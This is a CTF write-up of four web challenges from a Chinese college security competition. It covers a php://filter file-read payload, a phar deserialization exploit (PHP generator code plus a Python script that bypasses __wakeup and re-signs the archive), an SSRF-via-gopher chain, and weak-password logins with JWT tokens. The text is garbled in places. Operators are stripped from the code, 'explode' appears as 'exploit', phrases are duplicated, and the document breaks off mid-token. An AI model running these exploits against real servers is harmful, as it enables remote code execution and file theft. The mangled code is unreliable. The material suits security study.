Title: The 3rd Guangdong College Students Network Offensive and Defensive Competition WP

1. WEB

1. Disappearing flag

Access Denied

Fakeip plugin fake IP

Prompt File is Null

Try adding file parameters

?file=index.php` prompt `do not hack!

Probably filter-chain

Reference article:

https://www.cnblogs.com/linuxsec/articles/12684259.html

https://blog.csdn.net/yuanxu8877/article/details/127607264

php://filter/convert.iconv can succeed

/?file=php://filter/convert.iconv.utf-8.utf-16/resource=index.php

/?file=php://filter/convert.iconv.utf-8.utf-16/resource=/flag

2.unserialize_web

Let's first check if there are any common backup files or robots.txt, www.zip,git,svn,www.tar.gz

You can find a backup file, www.tar.gz

Then visit URL/www.tar.gz to download the backup file

I saw that the source code is all here, mainly looking at upload.php and download.php

Then you can see a similar question in CSDN, as follows:

https://blog.csdn.net/m0_70819573/article/details/129506508

https://blog.csdn.net/2301_79708753/article/details/135873948

https://www.bilibili.com/read/cv21572905/

Then open the link to the question, start with an upload form, and I can't do it anymore. Isn't it mean deserialization?

Then guess, it may be a combination of file upload and deserialization.

Then searching and finding that it is phar deserialization—deserialization contained in the file (file upload)

else{

$extensions=array('gif', 'jpg', 'png');

$temp=exploit('.', $_FILES['file']['name']);

$fileExtension=end($temp);

$fileSizeCheck=$_FILES['file']['size'];

$isExtensionAllowed=in_array($fileExtension, $extensions) ? true : false;

if ($fileSizeCheck $isExtensionAllowed){

$fileContent=file_get_contents($_FILES['file']['tmp_name']);

$haltCompilerCheck=strpos($fileContent, '__HALT_COMPILER();');

if(gettype($haltCompilerCheck)==='integer'){

echo 'phar';

From this code in uoload.php, we can know that only pictures of gif, jpg, and png can be uploaded, and content checks will be performed. The file cannot contain content "__HALT_COMPILER();".

So we need to compress the generated phar file into a compressed package to bypass the check.

class File {

public $val1;

public $val2;

public $val3;

public function __construct() {

$this-val1='val1';

$this-val2='val2';

}

public function __destruct() {

if ($this-val1==='file' $this-val2==='exists') {

if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this-val3)) {

eval($this-val3);

} else {

echo 'Access Denied';

}

}

}

public function __access() {

$Var='Access Denied';

echo $Var;

}

public function __wakeup() {

$this-val1='exists';

$this-val2='file';

echo 'file exists';

}

}

Then from the code in download.php, we can know that it is a regular deserialization. In the __destruct() magic method, there is an eval() function that can be used to execute commands, and there are command execution vulnerabilities. The if statement in the __destruct() method will first determine whether the variable v a l 1 is equal to f i l e, whether the variable val1 is equal to file, whether the variable val1 is equal to file, and whether the variable val2 is equal to exists.

Then to the following code

if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this-val3)) {

eval($this-val3);

This code is a conditional statement in PHP that checks whether a string matches a specific pattern. If the match is successful, the eval function will be executed to execute the code in the string.

Let's take a look at this regular expression

/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/:

/^ and $ represent the beginning and end of the string, ensuring that the entire string matches the pattern.

\s* Match zero or more whitespace characters.

system Matches the system in the string.

( and ) matches left and right brackets.

\s* Match zero or more whitespace characters.

'cat\s+/[^;]' matches the file path that starts with cat in single quotes. in:

’ Match single quotes.

cat matches cat string.

\s+ Match one or more whitespace characters.

/Match slash /.

[^;] Match zero or more non-semi-colon characters.

’ Match single quotes.

\s* Match zero or more whitespace characters.

; Match semicolons.

In other words, this regular expression is used to check if a string begins with system('cat, followed by a file path, and then ends with ');

So we can construct the value of $val3 as

system('cat /flag');

To get flag

If the content in t h i s − v a l 3 matches this pattern, e v a l will be executed ( the content in this-val3 matches this pattern, eval(this−val3 matches this pattern, eval(this-val3); will be executed, which means that the code in $this-val3 will be executed. This practice has security risks, because it allows arbitrary code execution, which may lead to security vulnerabilities such as code injection.

Visualize regular expressions https://wangwl.net/static/projects/visualRegex/#

Then you need to pay attention to this, you need to bypass the wakeup() magic method:

public function __wakeup() {

$this-val1='exists';

$this-val2='file';

echo 'file exists';

}

It forces v a l 1 to e x i s t s , val1 to exists, val1 to exists, and val2 to file, which will cause if judgment to fail when we trigger the destruct() magic method later

, so we need to bypass wakeup()

That is, CVE-2016-7124 needs to be used, and its scope of influence is

PHP5 5.6.25

PHP7 7.0.10

Its triggering method is also very simple, that is, when the value representing the number of object attributes in the serialized string is greater than the real attribute number, the execution of __wakeup will be skipped

So next we need to construct a phar file, upload it and let it perform deserialization, thereby executing our code

When uploading, zip will bypass phar detection, but the phar pseudo protocol will decompress zip. When decompressing, our phar pseudo protocol will trigger deserialization at file_get_contents() and execute the eval() command.

Phar file generation code:

?php

ini_set('phar.readonly', 'Off');

class File

{

public $val1;

public $val2;

public $val3;

public function __construct()

{

$this-val1='file';

$this-val2='exists';

$this-val3='system('cat /flag');';

}

}

$a=new File();

$phar=new Phar('aa3.phar');

$phar-startBuffering();

$phar-setStub('?php __HALT_COMPILER(); ');

$phar-setMetadata($a);

$phar-addFromString('test.txt', 'test');

$phar-stopBuffering();

php phar.php

Run the code to generate a phar file

You can see through 010 that the contents in the phar file are serialized

But an error will be reported when uploading and accessing

Warning: file_get_contents(phar://./upload/fuck.jpg): failed to open stream: phar '/var/www/html/upload/fuck.jpg' SHA1 signature could not be verified: broken signature in

There is a problem here. Although we can modify the phar file at 010 to bypass the wakeup() magic method, there is signature authentication here, and we have to fix the signature

Fixed with scripts, phar consists of data, data signature (20 bits), and signature format (8 bits).

import gzip

from hashlib import sha1

with open(r'D:\\Downlaods_1\\ANfang_CTF\\Webbbbbb\\aa3.phar', 'rb') as file:

f=file.read()

s=f[:-28] # Get the data to be signed

s=s.replace(b'3:{', b'4:{')#Replace the attribute value and bypass __wakeup

h=f[-8:] # Get the signature type and GBMB identity

newf=s + sha1(s).digest() + h # Data + Signature + (Type + GBMB)

#print(newf)

newf=gzip.compress(newf) #gzip compression of Phar files

with open(r'D:\\Downlaods_1\\ANfang_CTF\\Webbbbbb\\fuck3.png', 'wb') as file:# Change file suffix

file.write(newf)

Then upload png images

Perform POST parameter transfer at download.php, use phar://protocol pseudo to read the phar file and trigger deserialization:

file=phar://./upload/fuck3.png

Finally get flag

The flag is:

669b01045da0456ea2a2861ce57dd537

3.mypdf

I just clicked the function and found nothing. I saw that there is www.zip in the source code of f12.

Download the source code and see TCPDF v6.3.2

Look at the title registration function, directly register and display error, and look at the logic of source code registration html/api.php

Follow up to qInternal

will visit http://localhost:8082/``invites

Then go to pdf/internal.py

app.run(host='127.0.0.1', port=8082), the local 8082 port has a Python service enabled

Then local debugging came here and found that if(myJson['invite'] in open('invites.txt').read().split('\n')): cannot be avoided

Then google search 'ctf' TCPDF invites

Searched

https://cloud.tencent.com/developer/article/2069757

https://r0.haxors.org/posts?id=15

https://b6a.black/posts/2021-05-22-3kctf/#ppaste-web-498-points

Reference: https://r0.haxors.org/posts?id=15

invite:-3.3e99999999999999999999999999999999999999999

Then call the ssrf of the intranet

Like WP, I have been calling several times but failed to hit it. There is no request from the external network, so I can't guess the network is

Go to the source code and follow the original title wp to find the logic of the SSLF place

Comparison of original questions

You can see that gopher is released

So I just gopher and I still haven't tested it after testing it for a long time.

Finally, guess it might be that the cookie problem caused the user to log in or the previous user's cookie

Register admintest1 directly, play ssrf to teammates (admintest55), access action:admin successfully upgrade to admin

4.hackme

0 Solve the problem, after the game, the senior brother came out, while the environment was still reappearing

Two users have weak password login to get two tokens

admin;123456test;123456token_test='eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTcyLjIwLjI0MC4zMiJ9.A9CrtyzLavHQif9VRIHJN1kSjLefzcKPArv3Eo96EbSlD5gzRU78QGiFkdtW_YxQgYc7z82PqH1BQGWMf5CLBfYSQNB6V9HV7FyZJUpzZt2b-irXitYFhW2qQJr0i_yrJA'token_admin='eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7L